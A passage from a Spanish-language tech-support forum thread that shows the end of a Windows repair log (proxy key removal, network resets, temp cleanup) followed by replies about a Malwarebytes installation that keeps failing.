"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente


========= Final de RemoveProxy: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= Final de CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows


Adaptador de Ethernet Conexi¢n de  rea local:

   Sufijo DNS espec¡fico para la conexi¢n. . : 
   V¡nculo: direcci¢n IPv6 local. . . : fe80::80e9:423e:faf2:146%11
   Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.1.2
   M scara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 192.168.1.1

Adaptador de t£nel isatap.{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

Adaptador de t£nel Teredo Tunneling Pseudo-Interface:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

========= Final de CMD: =========


========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS.

========= Final de CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

{D714FDE1-7B7E-4C59-BD81-B3618421498C} canceled.
1 out of 1 jobs canceled.

========= Final de CMD: =========


========= netsh advfirewall reset =========

Aceptar


========= Final de CMD: =========


========= netsh advfirewall set allprofiles state ON =========

Aceptar


========= Final de CMD: =========


========= netsh int ipv4 reset =========

Interfaz se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final de CMD: =========


========= netsh int ipv6 reset =========

No hay valores configurados por el usuario para restablecer.


========= Final de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6122627 B
Java, Flash, Steam htmlcache => 132097 B
Windows/system/drivers => 324792678 B
Edge => 0 B
Chrome => 417833299 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
LocalService => 128 B
NetworkService => 6472 B
Familia Landaeta => 29351072 B

RecycleBin => 287539 B
EmptyTemp: => 750.5 MB datos temporales Eliminados.

================================


El sistema necesita reiniciarse.

==== Final  Fixlog 11:31:32 ====

sigue persistiendo un error

Trata de instalar Ccleaner…descarga un nuevo instalador porque salio hoy una nueva version

acabo de instalar exitosamente Ccleaner. Quisiera seguir intentando instalar Malwarebytes, debería crear un nuevo post o seguimos por aquì?

https://support.microsoft.com/es-es/help/929135/how-to-perform-a-clean-boot-in-windows

Reinicia el pc haciendo un inicio limpio y luego mira a ver si se instala Malwarebytes

sigue ocurriendo un error y no deja instalar el malwarebytes.

Prueba con esta version

https://www.majorgeeks.com/files/details/malwarebytes_anti_malware_2.html